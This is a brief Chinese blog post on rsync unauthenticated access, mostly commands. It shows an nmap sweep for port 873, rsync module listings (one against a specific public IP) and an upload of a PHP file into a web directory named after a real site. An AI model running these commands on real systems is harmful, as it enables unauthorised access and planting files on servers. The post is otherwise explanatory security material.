前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Rsync漏洞检测实践

Rsync漏洞检测实践

作者头像
全栈工程师修炼指南
发布2022-09-28 19:23:24
1.2K0
发布2022-09-28 19:23:24
举报

注意:本文分享给安全从业人员、网站开发人员以及运维人员在日常工作防范恶意攻击,请勿恶意使用下面介绍技术进行非法攻击操作。

[TOC]

Rsync 未授权访问漏洞

描述: 安全之默认密码登陆之Rsync未授权访问。

1.rsync默认的端口是873,可以使用nmap扫描IP是否开放该端口,当找到开放端口后,查看时候可默认口令登陆,使用命令查看:

代码语言:javascript
复制
# 扫描
nmap -n --open -p 873 x.x.x.x/24

# 验证
rsync ip::

# 显示二级文件
rsync -av 115.29.246.254::

2.既然是同步文件,自然有选择查看、上传或者下载的能力需视权限设定

代码语言:javascript
复制
# 同步数据到本地
rsync -vzrtopg --progress ./sxx.php 172.17.16.24::www/support.meitu.com
本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2019-05-31,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • Rsync 未授权访问漏洞
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档